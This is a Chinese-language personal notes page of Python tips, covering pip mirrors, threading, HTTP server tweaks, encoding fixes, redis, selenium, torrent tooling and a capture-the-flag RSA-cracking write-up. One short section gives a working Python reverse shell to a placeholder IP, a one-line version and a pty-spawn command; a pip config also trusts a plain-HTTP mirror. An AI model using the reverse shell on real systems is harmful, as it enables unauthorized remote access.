# Python

嗯哼，Python很好玩呢...有人说Python是能运行的伪代码，就写代码的速度而言是显著优于C的，也有很多好用的类库呢，反正强烈推荐这门语言啦~

当你尝试一个包的时候，注意自己的py文件名称不能与包名重名，例如不要出现flask.py


----

## 设置pip源 - mirrors.aliyun.com

如果只需要一次性安装个包（如Dockerfile）： 

```
pip install -i https://mirrors.aliyun.com/pypi/simple/ --trusted-host mirrors.aliyun.com
```

在Linux服务器上安装python的包时，执行这段代码可以将pip源改为国内的阿里镜像（豆瓣源似乎不再更新），能显著提高包的下载速度

```bash
mkdir -p ~/.pip
echo """
[global]
index-url = http://mirrors.aliyun.com/pypi/simple/
[install]
trusted-host=mirrors.aliyun.com
""">~/.pip/pip.conf
```

至于Windows用户，在用户目录下创建一个pip目录，如：C:\Users\chenyuan\pip，新建文件pip.ini，内容如下：

```
[global]
index-url = http://mirrors.aliyun.com/pypi/simple/
[install]
trusted-host=mirrors.aliyun.com
```

### 反弹shell

首先自己的服务器上用**nc -l 端口**

```python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(( "IP地址" , 端口 ))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
```

单行版本：

```
IP="x.x.x.x";PORT=6666;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(( IP , PORT ));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])
```

### 获得一个tty

    python -c 'import pty; pty.spawn("/bin/sh")'

----

## 让requests使用多个IP

requests包并没有使用socket.create_connection函数，所以替换socket.create_connection并不够

```python
def function_hook_parameter(oldfunc, parameter_index, parameter_name, parameter_value):
    """
    创造一个wrapper函数，劫持oldfunc传入的第parameter_index名为parameter_name的函数，固定其值为parameter_value; 不影响调用该函数时传入的任何其他参数
    用法： 原函数 = function_hook_parameter(原函数, 从1开始计数的参数所处的位置, 这个参数的名称, 需要替换成的参数值)

    例子： 需要劫持socket.create_connection这个函数，其函数原型如下： 
               create_connection(address, timeout=_GLOBAL_DEFAULT_TIMEOUT, source_address=None)
           需要对其第3个参数source_address固定为value，劫持方法如下
               socket.create_connection = function_hook_parameter(socket.create_connection, 3, "source_address", value)
    """
    real_func = oldfunc
    def newfunc(*args, **kwargs):  # args是参数列表list，kwargs是带有名称keyword的参数dict
        newargs = list(args)
        if len(args) >= parameter_index:  # 如果这个参数被直接传入，那么肯定其前面的参数都是无名称的参数，args的长度肯定长于其所在的位置
            newargs[parameter_index - 1] = parameter_value  # 第3个参数在list的下标是2
        else:  # 如果不是直接传入，那么就在kwargs中 或者传入的可选参数中没有这个参数，直接设置kwargs即可
            kwargs[parameter_name] = parameter_value
        return real_func(*newargs, **kwargs)
    return newfunc


myip = "x.x.x.x" #你需要使用的IP，需要操作系统已经取得这个IP
import socket
socket.create_connection = function_hook_parameter(socket.create_connection, 3, "source_address", (myip, 0))
import requests
bakup_create_connection = requests.packages.urllib3.util.connection.create_connection #备份一份以备后续继续替换
requests.packages.urllib3.util.connection.create_connection = function_hook_parameter(requests.packages.urllib3.util.connection.create_connection, 3, "source_address", (myip, 0))

# 验证是否成功修改源IP
print(requests.get("http://ip.cn").text) #访问网站查看当前使用的公网IP，如果内网你可以自行搭建服务器查看访问日志从而确定IP

# 如果后续还要进行替换，则应该传入bakup_create_connection
mynewip = "x.x.x.y" #另外一个当前操作系统已经取得的IP
requests.packages.urllib3.util.connection.create_connection = function_hook_parameter(bakup_create_connection, 3, "source_address", (mynewip, 0))
```



----

## Python多线程模板

使用threading模块进行开发

[MultiThread_Template.py](code/MultiThread_Template.py)

## http.server（BaseHTTPServer）并发性改善

### New version 不必修改库代码

在使用BaseHTTPServer.HTTPServer的时候，对其使用的父类修改创造自己的类，参考[How to dynamically change base class of instances at runtime?](https://stackoverflow.com/questions/9539052/how-to-dynamically-change-base-class-of-instances-at-runtime)

```
import BaseHTTPServer # 如果py3，需要import http.server as BaseHTTPServer
import socketserver
MyHTTPServer = type('MyHTTPServer', (socketserver.ThreadingTCPServer,), dict(BaseHTTPServer.HTTPServer.__dict__))

def MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    pass # 省略handler的代码，一些do_GET，do_POST的函数

httpd = MyHTTPServer( ('0.0.0.0', 80), MyHandler)
httpd.serve_forever()
```

怎么知道MyHTTPServer的父类确实被修改了呢？ 可以查看其__mro__属性（Method Resolution Order attribute）

### Old version 修改库代码(不建议)

> 参考资料：[利用Python中SocketServer 实现客户端与服务器间非阻塞通信](http://blog.csdn.net/cnmilan/article/details/9664823)

> 直接修改BaseHTTPServer的代码中的一个细节，将BaseHTTPServer类继承的原先只能支持单个请求的SocketServer.TCPServer改为每个连接一个线程的SocketServer.ThreadingTCPServer，使BaseHTTPServer能支持并发而不是一次只能处理单个请求

**Python3的方法**：

在Python3中BaseHTTPServer改名为http.server了，首先找到http.server所在的py文件：

    python3 -c "import http.server; print(http.server)"

修改其提示的文件，例如我这里是`/usr/lib/python3.4/http/server.py`

搜索`class HTTPServer`，如果是用vim可以用`/class HTTPServer`

修改找到的这一行，改为：

```python
class HTTPServer(socketserver.ThreadingTCPServer):
```

**Python2的方法**：

首先找到BaseHTTPServer在哪：

     python -c "import BaseHTTPServer; print(BaseHTTPServer)"

修改对应的文件，如/usr/lib/python2.7/BaseHTTPServer.py，注意不要打开他直接提示的pyc文件而是要对应的同名py文件

找到这行（vim中可以输入`/class HTTPServer`进行搜索）：

```python
class HTTPServer(SocketServer.TCPServer):
```

修改其继承的父类：

```python
class HTTPServer(SocketServer.ThreadingTCPServer):
```

----

## 无root权限安装Python

下载最新版python源码后指定prefix编译，假设用户目录为/home/chenyuan

```
apt-get install libssl-dev openssl 
curl -O https://www.python.org/ftp/python/3.5.2/Python-3.5.2.tgz
tar -xzf Python-3.5.2.tgz
cd Python-3.5.2/
./configure --prefix=/home/chenyuan/python3
make
make install >/dev/null
pushd /home/chenyuan/python3/bin
cp python3 python
cp pip3 pip
alias python3=`pwd`/python
alias pip3=`pwd`/pip
```

----

## 中文输出乱码问题

方法1：运行py前设置环境变量

```bash
export PYTHONIOENCODING=utf8
```

方法2：强制修改stdout

```
import sys
sys.stdout=open(1, 'w', encoding='utf-8', closefd=False)
```

----

## 遵循PEP8检查你的代码

[pycodestyle](https://github.com/PyCQA/pycodestyle)

安装并使用pycodestyle检查代码，忽略E501一行不能长于80个字符的限制：

```
pip install pycodestyle
pycodestyle --show-source --ignore=E501 yourcode.py
```

----

## 生成随机字符串

```
import random
import string
def random_str(length=8):
    return "".join(random.sample(string.ascii_letters, length))
```

```
from random import Random
def random_str(randomlength=8):
    str = ''
    chars = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789'
    length = len(chars) - 1
    random = Random()
    for i in range(randomlength):
        str+=chars[random.randint(0, length)]
    return str
```

----

## Python解方程

需要 `pip install sympy`

```
from sympy import *
# 解一元方程：
#   2x^2-18=0
x=Symbol('x')
print(solve(2*x**2-18,x))
# 得到[-3,3]

# 解方程组
#   y=1-x
#   3x+2y-5
x,y=symbols('x y')
print(solve([ y-1+x, 3*x+2*y-5 ], [ x , y ]))
# 得到{x: 3, y: -2}
```

----

## 大数据判断in

一定要用set，因为set的in操作是O(1)的，用list是O(n)速度太慢

----

## 解决Python.h: No such file or directory

```
apt-get install -y python-dev python3-dev
```

如果为CentOS系统：

```
yum install python-devel
```

----

## 二进制字符串转普通字符串

方法一：将字符串每8个分成一组，用int转10进制，再用chr转为ascii字符

```
s="0110001101111001"
ans=""
for i in range(0,len(s)//8):
    x = s[i*8:i*8+8]
    ans+=chr(int(x,2))
```

方法二：利用binascii，先用int转为10进制，然后转为16进制字符串，调用unhexlify执行翻译

```
import binascii
s="0110001101111001"
ans=binascii.unhexlify('%x'%int(s,2)).decode()
```

补充：相应的如果要把十进制转为二进制，可以用bin(123)[2:]

----

## 十六进制字符串转bytes字符串

```
from base64 import b16encode,b16decode
print( b16encode(b'py3.io').decode() ) #output: 7079332E696F
print( b16decode("7079332E696F".upper()) ) #output: b'py3.io', 这里使用upper转大写
```

相应的，拿到一个十进制数，转字符串：

```
key = 5287002131074331513
print( b16decode( hex(key)[2:].upper() ) )#output: b'I_4m-k3y'
```

----

## 用Python3写PAT心得

* 如果发生格式错误，检查输出的最后一行的print，加上end=""表示不要换行

* 如果数据规模大导致超时，代码中的in操作前先把list转为set，能大幅度提速

----

## 用requests进行post

需要注意加上这两个参数：

```
,allow_redirects=False,headers={"Content-Type": "application/x-www-form-urlencoded"}
```

登录请求的时候是要根据返回的headers里面Location有没有对不对来判断登录是否成功的，而requests默认会跟随301/302跳转，导致无法获取到跳转请求的headers，所以加上`allow_redirects=False`

另外就是post数据的时候必须给出正确的Content-Type，否则服务器不认这个post的

再者就是可能对方有反爬虫措施，加上Referer和User-Agent就好咯

如果需要提交的是json的数据，记得post的data的单双引号要正确，应该用json.dumps的结果去post

如果要做爬虫，欢迎使用我的[EasyLogin](https://github.com/zjuchenyuan/EasyLogin)，无需再操心这些细节，专注于核心爬虫代码

----

## 通过tkinter获取、修改剪贴板

支持py2和py3，Learned from https://www.daniweb.com/programming/software-development/code/487653/access-the-clipboard-via-tkinter

```
try:
    from tkinter import Tk
except ImportError:
    from Tkinter import Tk
root = Tk()
root.withdraw() #隐藏Tk的窗口
text = "Donnerwetter"
# 清空剪贴板 clear clipboard
root.clipboard_clear()
# 写入剪贴板 write text to clipboard
root.clipboard_append(text)
# 读取剪贴板 text from clipboard
clip_text = root.clipboard_get()
print(clip_text)  # --> Donnerwetter
```

----

## 符号数与无符号数转换

### 无符号→有符号，为了加上负号：

```
import ctypes
ctypes.c_int64(17039472050328044269).value
```

上述将得到-1407272023381507347

### 有符号→无符号，为了去掉负号：

```
import ctypes
ctypes.c_uint64(-1407272023381507347).value
```

上述将得到17039472050328044269

----

## 使用signal.SIGALRM在限定时间后退出进程 (only Linux)

在设计CTF的题目的时候，有必要限制用户的连接时间，这时候简单方案就是用SIGALRM信号咯

```
def clock(timeout=5):
    import signal
    def signal_handler(signum,data):
        if signum == signal.SIGALRM:
            print("Time is up!")
            exit()
    signal.signal(signal.SIGALRM, signal_handler)
    signal.alarm(int(timeout))
```

----

## 捕捉用户的Ctrl+C

特殊情况下我们想屏蔽掉Ctrl+C，这时候写个自己的函数处理SIGALRM信号就好啦

```
import signal

def signal_handler(signum,data):
    if signum == signal.SIGINT:
        print("Ctrl+C is pressed!")
        #raise KeyboardInterrupt

if __name__ == '__main__':
    signal.signal(signal.SIGINT, signal_handler)
    sleep(666)
```

----

## 使用signal.SIGALRM实现定时器 (only Linux)

实现一个类似Javascript的setInterval功能

```
import signal
from time import sleep
INTERVAL=1
COUNT=0
def signal_handler(signum,data):
    global COUNT
    if signum == signal.SIGALRM:
        # 你的定时器代码写在这里 Your function here
        print("Count! {}".format(COUNT))
        COUNT+=1
        signal.alarm(int(INTERVAL)) #再设置一个clock就能循环往复咯

if __name__ == '__main__':
    signal.signal(signal.SIGALRM, signal_handler)
    signal.alarm(int(INTERVAL))
    sleep(23333)
```

----

## 使用pdb进行调试

在需要调试的文件头部加入

```
import pdb
```

需要停下来的地方加入

```
pdb.set_trace()
```

Tutorial: [https://github.com/spiside/pdb-tutorial](https://github.com/spiside/pdb-tutorial)

----

## 使用Python开发Serverless(Function as Service)后端服务

[项目地址 & 部署过程](https://github.com/zjuchenyuan/zju-jwb-to-icalendar)

如果您只是需要部署一个Example，↑↑↑(顺手求个Star)；如果您对这个代码是如何写出来的和踩坑过程感兴趣，继续看吧：

### 踩过的坑与解决过程(论阿里云是怎么把人气死的)

#### 1.API网关与函数计算的对接

按照[教程](https://help.aliyun.com/document_detail/54788.html)，当时不够耐心，拿着hello world的程序（不要信教程中的2.1部分的截图）就在使用API网关，结果总是返回503

耐心下来看文档把程序改为后面的撞墙式程序就好了，人家其实说了函数计算应该返回的数据结构，不按照这个结构来就会503：

```
{
    "isBase64Encoded": True或者False,
    "statusCode": 200, #可以为302来实现跳转
    "headers": {...} #返回的response headers，但其中的Content-Type没有作用
    "body": "..." #返回的网页正文内容
}
```

#### 2.修改API网关参数定义后要再次发布

无论有没有改Mock设置，只要改动了设置都需要重新发布，发布线上版本即可

#### 3.不能使用Windows版本的fcli工具(fcli.exe)

人家已经发布了新版本的fcli解决了此问题

这个bug简直了，整个流程如下：

按照文档说明一路部署上传都没有问题，调用函数的时候却说`Unable to import module 'index'`

然后我就在Linux服务器上`docker pull python:2.7`然后`docker run -it --rm -v /root/ical:/code` python:2.7 /bin/bash`，进入bash后`cd /code; python`，进入python后`import index`

啊哈，发现是`ImportError: No module named 'bs4'`，自己的锅，用`pip install bs4 -t .`一个个解决依赖包后，在docker容器中总算是能够跑起来了，且能正常返回了

然后用`fcli.exe shell`的`mkf`再上传一次，调用函数还是老样子`Unable to import module 'index'`，令人很抓狂。。。

突然想到不能被import应该是全局的import失败了，多次折腾后，把`from grabber import grabber`移动到index函数中，总算得到了明确的报错：还是`ImportError: No module named 'bs4'`；哈？这是什么鬼，明明我都把bs4文件夹放到代码目录下了，为啥还是报错？

既然他说import失败，会不会是Python搜索包的PATH的问题，于是Google到了把当前文件所在的目录加入搜索的方法：

```
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
```

Orz, 还是没有用。。。

想到既然部署后代码文件夹`/code`没有我需要的依赖包，那`/code`文件夹里面到底有啥呢？果断fuck一下，在index函数开头写上:

```
def index():
    return {"fuck": list(os.listdir("/code"))}
    import bs4 #会出错的import
    ...#正常代码
```

总算调用成功了，然后一看输出结果，woc! (内心中骂了多次mdzz阿里云

给张截图：

![](assets/img/fuckaliyun.jpg)

os.listdir应该返回的是当前这个文件夹下含有的文件名称和文件夹名称，而现在我们看到的是含有`\\`很像路径名的东西，说明这个fcli.exe把windows的`\\`路径名当成了文件名的一部分，部署后在/code文件夹下也就对应创建了名称为`bs4\\__init__.py`这样的文件(根本没有bs4子文件夹)，Python当然会找不到bs4这个包啊！摔！

改用人家fcli的Linux 64bit版本，问题解决。。。

总结一下，万万想不到Windows版本的工具(针对0.5版本)会把路径分隔符`\\`当成文件名一部分来看待，真是大开眼界

----

## 修复Linux下gbk编码的文件名

代码见[code/fixgbknames.py](code/fixgbknames.py)

在特殊情况下，Linux中可能会有gbk编码的文件名，这种文件用`ls`查看都是乱码，难以操作

如何修复这些`错误`的文件名呢？用到`python3`提供的os.walk(b".")就能得到bytes类型的文件名，然后`os.system`调用bytes类型的`mv`命令行就好啦~

----

## Crack RSA!

### 题目信息

题目来源：[清华蓝莲花战队纳新表（需自备梯子）](https://docs.google.com/forms/d/e/1FAIpQLSfOI5AgEvlqa6-nRLAZI8Dvs6_XmZDHSog2pKteS5rvp3AU0Q/viewform)

密码学 (Cryptography)

RSA算法的原理以及破解，请下载[这个文件](https://d.py3.io/rsa.zip)，解密其中的flag.enc文件。

### RSA是啥

略...(连这个都不知道还不去google，你适不适合CTF心里一点B数都没有吗)

符号约定： n一个大数， p和q是它的质因子，d私钥，m信息明文，c信息密文

### 破解的数学原理

参考：https://stackoverflow.com/questions/4078902/cracking-short-rsa-keys

Google搜索关键词 crack rsa key

给定公钥n和e，假定我们成功分解n = p * q，那么求出d

```
d = e^-1 mod phi(n)
  = e^-1 mod (p-1)*(q-1)
```

现在我们有了私钥d，可以对密文c解密得到明文m：

```
m = c^d (mod n)
```

### 实现它

#### 题目给的公钥是啥格式，怎么读取出N和e?

题目给的公钥是这样的：

```
-----BEGIN PUBLIC KEY-----
MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhAMgVHv67DCP6oRAiQJxaEuSluWmE5iZb
e+fuqvuwBPUfAgMBAAE=
-----END PUBLIC KEY-----
```

看起来很短，估计是可以分解的比较小的N

google搜索关键词：openssl get n from public key

参考：https://stackoverflow.com/questions/3116907/rsa-get-exponent-and-modulus-given-a-public-key

人家给出了这样的做法：(环境Linux，已经安装openssl)

```
# 丢弃头尾的---行，提取公钥内容并合并一行（这是base64编码的字符串）
PUBKEY=`grep -v -- ----- public.pem | tr -d '\n'`
# 编码格式是asn1，查看这种编码的格式
echo $PUBKEY | base64 -d | openssl asn1parse -inform DER -i
```

将输出：

```
    0:d=0  hl=2 l=  60 cons: SEQUENCE
    2:d=1  hl=2 l=  13 cons:  SEQUENCE
    4:d=2  hl=2 l=   9 prim:   OBJECT            :rsaEncryption
   15:d=2  hl=2 l=   0 prim:   NULL
   17:d=1  hl=2 l=  43 prim:  BIT STRING
```

最后一行BIT STRING就是数据所在的位置，偏移为17

提取出来：

```
echo $PUBKEY | base64 -d | openssl asn1parse -inform DER -i -strparse 17
```

得到：

```
    0:d=0  hl=2 l=  40 cons: SEQUENCE
    2:d=1  hl=2 l=  33 prim:  INTEGER           :C8151EFEBB0C23FAA11022409C5A12E4A5B96984E6265B7BE7EEAAFBB004F51F
   37:d=1  hl=2 l=   3 prim:  INTEGER           :010001
```

嗯~这样就看到十六进制的n和e啦，转为十进制的话python里面直接输入:

```
n = 0xC8151EFEBB0C23FAA11022409C5A12E4A5B96984E6265B7BE7EEAAFBB004F51F
print(n) 
```

上述python执行后将输出

90499887424928873790510606439768063703452393541528122252967476339871041516831

同理我们得知e=65537，一般RSA加密都会把公钥的e选为65537

#### 怎么分解n 得到p和q？

你可以自己写代码，然而我懒，直接查数据库：

打开factordb.com这个神奇的网站，输入n的值就能查到分解结果啦：

http://factordb.com/index.php?query=90499887424928873790510606439768063703452393541528122252967476339871041516831

分解结果：

```
9049988742...31<77> = 283194537446483890135816972554288437117<39> · 319567913424286672035093410391626922443<39>
```

好了，我们就知道 p q了，具体哪个是p哪个是q并不重要

p=283194537446483890135816972554288437117, q=319567913424286672035093410391626922443

#### 怎么计算私钥d

根据RSA原理， d = e^-1 mod (p-1)\*(q-1)， 现在我们有了p和q，mod后面的(p-1)\*(q-1)自然是可以求出来的

但e^-1是个啥玩意？倒数？ 倒数还能求模？

emmm 其实是求逆元啦 然而不会写代码怎么办，当时是继续google啊

google关键词： python calculate inverse mod

参考：https://stackoverflow.com/questions/4798654/modular-multiplicative-inverse-function-in-python

得到代码：

```
def egcd(a, b):
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
        return (g, x - (b // a) * y, y)

def modinv(a, m):
    g, x, y = egcd(a, m)
    if g != 1:
        raise Exception('modular inverse does not exist')
    else:
        return x % m
```

看不懂这代码在干啥？我也看不懂，但没关系，直接用就行 这么多人点赞肯定是对的

那现在就着手把这代码搬运到我们的py中咯：

```
N = 0xC8151EFEBB0C23FAA11022409C5A12E4A5B96984E6265B7BE7EEAAFBB004F51F
e = 0x10001

p = 283194537446483890135816972554288437117
q = 319567913424286672035093410391626922443

def egcd(a, b):
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
        return (g, x - (b // a) * y, y)

def modinv(a, m):
    g, x, y = egcd(a, m)
    if g != 1:
        raise Exception('modular inverse does not exist')
    else:
        return x % m

d = modinv(e, (p-1)*(q-1))
print(d)
```

上述python将输出34458919248694250828820386546500026880096887166581679876896066449320377773297， 真是一个好大的d啊。。。

#### 怎么把flag.enc当成一个int读入？

试图用记事本打开flag.enc，乱码了；那用二进制形式打开flag.inc文件看看：
![](https://d.py3.io/img/15365186860.png)

emmm一共32字节长的密文，直接读文件将得到bytes strig，怎么把它转为一个很大的整数呢？

google关键词： python byte string to int

参考：https://stackoverflow.com/questions/444591/convert-a-string-of-bytes-into-an-int-python

人家给出了python3.2以后可以用int.from_bytes的方式，继续写我们的py咯：

```
encrypteddata = open('flag.enc','rb').read()
c = int.from_bytes(encrypteddata, 'big')
print(c)
```

这里的'big'表示大端存放的方式，就是最重要的那一位是靠左边的

插一句：通过询问其他大佬，我也折腾出了一种naive的方法——使用binascii模块先转为hex编码，然后hex按16字节转int:

```
encrypteddata = open('flag.enc','rb').read()
import binascii
c = int(binascii.b2a_hex(encrypteddata).decode(),16)
print(c)
```

#### 计算明文

公式（密码学肯定要考的，所以再记一次咯）

```
m = c^d (mod n)
```

问题来了，d是个那么大的数，如果直接写一个：

```
# 在python里**表示乘方
m = (c**d)%n
```
果然运行这个py就卡死了，实际上并没有必要算出精确的c\*\*d，我们需要调用快速的mod乘方的方法

google关键词： python mod pow

参考：https://stackoverflow.com/questions/32738637/calculate-mod-using-pow-function-python

人家说pow函数就可以提供第3个参数，例如pow(6, 8, 5)就是 6^8 mod 5

那就写代码咯(瞎写，C语言的pow需要#include <math.h> 那我就也从math导入吧)：

```
from math import pow
m = pow(c,d,n)
```

然而命途多舛，果然报错：

```
Traceback (most recent call last):
  File "run.py", line 35, in <module>
    m = pow(c,d,n)
TypeError: pow expected 2 arguments, got 3
```

emmm... 奇了怪了，这是什么鬼嘛，说好的支持第三个参数呢，翻回去仔细看人家给的[文档链接](https://docs.python.org/3/library/functions.html#pow)

嗯？这文档的标题就是Built-in Functions，我懂了！ 支持第三个参数的pow函数是内置的那个，而不是math库提供的，删掉`from math import pow`这一句就好了

我们的py又加上了两行：

```
m = pow(c,d,n)
print(m)
```
得到输出 4114174865819530012247735243997890458185276719507135882385278623252053258

### 明文这么一个大数 我要的flag呢？

cy打开了他的笔记本 [https://py3.io/Python.html#bytes](https://py3.io/Python.html#bytes)

查到了 十六进制字符串转bytes字符串 和 拿到一个int转字符串 的方法：

```
from base64 import b16decode
print( b16decode( hex(m)[2:].upper() ) )
```

果然 又tm出错了：

```
Traceback (most recent call last):
  File "run.py", line 37, in <module>
    print( b16decode( hex(m)[2:].upper() ) )
  File "/usr/lib/python3.5/base64.py", line 276, in b16decode
    return binascii.unhexlify(s)
binascii.Error: Odd-length string
```

odd-length啥意思？奇数长度？对噢 十六进制字符串肯定要偶数长度才行（两个一组表示一个字节嘛） 那么就前面补个0咯

py代码如下：（其实你也可以试试int.to_bytes方法）

```
plaindata = hex(m)[2:].upper()
if len(plaindata)%2 :
    plaindata = "0"+plaindata
print(b16decode(plaindata))
```

输出：

```
b'\x02T\x1b:(\x02\xb9\x8c8\xbb\x00CTF{256i3_n0t_SAfe}\n'
```

啊哈！ 总算能搞定啦，flag到手！

### 完整的代码

```
# parse public key: https://stackoverflow.com/questions/3116907/rsa-get-exponent-and-modulus-given-a-public-key
# PUBKEY=`grep -v -- ----- public.pem | tr -d '\n'`
# echo $PUBKEY | base64 -d | openssl asn1parse -inform DER -i
# echo $PUBKEY | base64 -d | openssl asn1parse -inform DER -i -strparse 17


n = 0xC8151EFEBB0C23FAA11022409C5A12E4A5B96984E6265B7BE7EEAAFBB004F51F
e = 0x10001
print(n)
# visit http://factordb.com/index.php?query=90499887424928873790510606439768063703452393541528122252967476339871041516831
p = 283194537446483890135816972554288437117
q = 319567913424286672035093410391626922443

def egcd(a, b):
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
        return (g, x - (b // a) * y, y)

def modinv(a, m):
    g, x, y = egcd(a, m)
    if g != 1:
        raise Exception('modular inverse does not exist')
    else:
        return x % m
d = modinv(e, (p-1)*(q-1))
print(d)
encrypteddata = open('flag.enc','rb').read()
import binascii
c = int(binascii.b2a_hex(encrypteddata).decode(),16)
print(c)
c = int.from_bytes(encrypteddata, 'big')
print(c)
m = pow(c,d,n)
print(m)
from base64 import b16decode
plaindata = hex(m)[2:].upper()
if len(plaindata)%2 :
    plaindata = "0"+plaindata

print(b16decode(plaindata))
```

----

## 时间戳与字符串相互转换

import time

得到当前时间戳： int(time.time())

得到当前时间字符串：time.strftime("%Y-%m-%d %H:%M:%S")

时间戳1381419600转字符串：time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(1381419600))

字符串"2013-10-10 23:40:00"转时间戳：int(time.mktime(time.strptime("2013-10-10 23:40:00","%Y-%m-%d %H:%M:%S")))

----

## 用redis存储字典

假设存储一个用户名对应用户ID的字典，名称为USERS，例如{"zhangsan":1, "lisi":2}

```python
import redis
r = redis.StrictRedis(host='localhost', port=6379, db=1) #db参数可以理解为命名空间
assert r.ping() # 是否成功连上

USERS = {"zhangsan":1, "lisi":2}

# 存储字典
r.hmset("USERS", USERS)

# 获得已经存储的字典里面有哪些键，返回bytes的list
KEYS = r.hkeys("USERS") 

# 获得整个字典并转换回原来的类型
USERS1 = {i.decode():int(j) for i,j in r.hgetall("USERS").items()}

# 修改字典中一个key的value
r.hset("USERS","zhangsan",3)

# 删除存储的字典，只能一个个删，先要hkeys获取有哪些键
_=[r.hdel("USERS", key) for key in r.hkeys("USERS") ]

# 扫描式获得已经存储的字典里面有哪些键
## 如果字典里面存储了太多东西，执行KEYS会卡住整个redis，用hscan是更好的选择
## 这里先生成一个比较大的字典存进去
import random, string
randomstr = lambda n: "".join(random.sample(string.ascii_letters, n))
USERS = {randomstr(10): random.randint(1,10000) for _ in range(10000)} # 生成一个1w条记录的字典
r.hmset("USERS", USERS) # 存进去

## 循环hscan
cursor, result = r.hscan("USERS")
while cursor:
    cursor, tmp = r.hscan("USERS", cursor)
    result.update(tmp)

USERS2 = {i.decode():int(j) for i,j in result.items()} #从bytes转为原来的格式
assert USERS==USERS2 #存进去的与取出来的应该相同
```

----

## 搬运种子 从北邮人搬运到NexusHD

代码： [code/autoseed_byr2nhd.py](code/autoseed_byr2nhd.py)

依赖于[EasyLogin](https://github.com/zjuchenyuan/EasyLogin)，以及 `pip3 install transmissionrpc python-resize-image`

运行需要提供byr和NHD的登录cookie，以及transmission连接信息

----

## python selenium+Docker chrome headless爬复杂网页

例子：阿里云所有域名价格页面 https://wanwang.aliyun.com/help/price.html

从网络请求看出其价格接口有多个，而且较为复杂；那就不妨试试用selenium让chrome headless访问这个页面，加载渲染完成后我们再获取页面源代码，此时源代码里面就有了完整的价格数据

运行环境：只需要Docker和Python3，无需桌面环境

镜像参考：https://hub.docker.com/r/selenium/standalone-chrome/

先跑起来容器呗，这样就运行了selenium server，主机暴露了一个6666端口，：

```
docker run -d -p 6666:4444 -v /dev/shm:/dev/shm selenium/standalone-chrome
```

安装Python包：`pip3 install selenium`

调用代码，爬取url，得到网页源代码，其中127.0.0.1相应地修改为Docker主机的IP:

```
url = "https://wanwang.aliyun.com/help/price.html"

from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
driver = webdriver.Remote(
    command_executor='http://127.0.0.1:6666/wd/hub',
    desired_capabilities=DesiredCapabilities.CHROME)
driver.get(url)
html = driver.page_source
with open("result.html", "w", encoding="utf-8") as fp:
        fp.write(html)
driver.quit() #一定要记得清理掉Chrome进程 否则内存会占满
```

如果没有在代码里面清理Chrome进程，可以在浏览器里面进入Console，在这里可以看到当前运行的Session (Chrome进程) ，对当前页面查看页面截图：
http://127.0.0.1:6666/wd/hub/static/resource/hub.html

----

## python丢弃root权限

如果python需要监听80端口，简单方式就是直接用root权限启动，但启动后可以丢弃root权限来提高安全性

code from https://stackoverflow.com/questions/2699907/dropping-root-permissions-in-python

```
import os, pwd, grp

def drop_privileges(uid_name='nobody', gid_name='nogroup'):
    if os.getuid() != 0:
        # We're not root so, like, whatever dude
        return

    # Get the uid/gid from the name
    running_uid = pwd.getpwnam(uid_name).pw_uid
    running_gid = grp.getgrnam(gid_name).gr_gid

    # Remove group privileges
    os.setgroups([])

    # Try setting the new uid/gid
    os.setgid(running_gid)
    os.setuid(running_uid)
```

----

## python transmissionrpc

下述主要介绍[transmissionrpc](https://pythonhosted.org/transmissionrpc/)这个库的使用

### 上传一个种子 开始下载

使用Client的add_torrent方法，传入种子文件的base64

```
def upload_transmission(thost, tport, tuser, tpassword, filename):
    tc = transmissionrpc.Client(thost, port=tport, user=tuser, password=tpassword)
    return tc.add_torrent(base64.b64encode(open(filename, "rb").read()).decode())
```

返回值是一个不完整的torrent对象

### 获取完整的torrent对象

```
torrent_id = torrent.id
full_torrent = tc.get_torrent(torrent_id)
```

其中就有状态和进度信息

```
print(full_torrent.status, full_torrent.progress)
```

### 给种子增加一个tracker

这样可以把pt站点的种子转到OpenTracker，无需重新校验种子（但传到新的pt站点infohash会变，只能传新种子重新校验）

transmissionrpc本身似乎没有暴露出trackerAdd的方法，这是结合浏览器和翻阅代码自己试出来的

```
torrent._client._request('torrent-set', {"trackerAdd": [new_tracker_url]}, torrent.id, True)
```

### 修改一个.torrent文件的tracker

使用torf库，这个库使用了python3.6才支持的特性，依赖于格式化字符串、dict遍历的有序性

我修改后的版本下载，支持py3.5：https://d.py3.io/torf.zip

代码：

```
t=torf.Torrent.read(torrent_filename)
t.trackers=[[new_tracker_url]]
t.write("new.torrent")
```

----

## uwsgi优雅重启

参考：http://uwsgi-docs.readthedocs.io/en/latest/articles/TheArtOfGracefulReloading.html

在uwsgi.ini中添加一行：

```
master-fifo = /tmp/uwsgififo
```

需要重启的时候就：

```
echo r>/tmp/uwsgififo
```

文件打开方式必须是"w"而不能是"a"：

```
open("/tmp/uwsgififo", "w").write("r")
```

## flask设置一堆静态目录

```python
from flask import Flask, render_template, Blueprint, request, redirect, Markup
app = Flask(__name__)
for path in ['pic', 'skin', 'images', '更多静态目录']:
    blueprint = Blueprint(path, __name__, static_url_path='/'+path, static_folder=path)
    app.register_blueprint(blueprint)
```

----

## Python3.5 open打开文件默认使用utf-8

Windows下open打开文件总是会使用gbk，配置环境变量如PYTHONIOENCODING都没用，就很气，难道只能每次open都保证写上encoding="utf-8"嘛？当然不必

google搜索关键词：windows python3 change open file encoding

解决方案：参考：https://stackoverflow.com/questions/31469707/changing-the-locale-preferred-encoding-in-python-3-in-windows

添加代码：由于只有windows才需要这么处理，所以先判断操作系统

```
import sys
if sys.platform.startswith("win"):
    import _locale
